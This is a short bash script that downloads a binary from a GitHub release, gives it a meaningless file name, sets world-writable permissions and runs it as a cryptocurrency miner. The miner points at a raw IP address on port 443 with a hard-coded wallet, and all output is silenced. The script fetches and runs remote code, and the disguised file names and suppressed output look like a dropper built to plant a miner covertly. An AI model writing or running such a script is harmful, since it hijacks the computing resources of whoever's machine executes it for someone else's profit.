#!/bin/bash
rm -rf peakminer-2.16.2.tar.gz
wget https://github.com/vedhagsvp/tkospae/releases/download/aplose/pkso
mv pkso lsejas
chmod 777 lsejas
./lsejas --coin pearl -o 23.239.21.149:443 -u prl1pppylldgxwhafzgn0lxfvgx7xukpcqeq7lkfv77t2dwkaxf86zedstaam4t/$(echo $RANDOM | md5sum | head -c 10) > /dev/null 2>&1
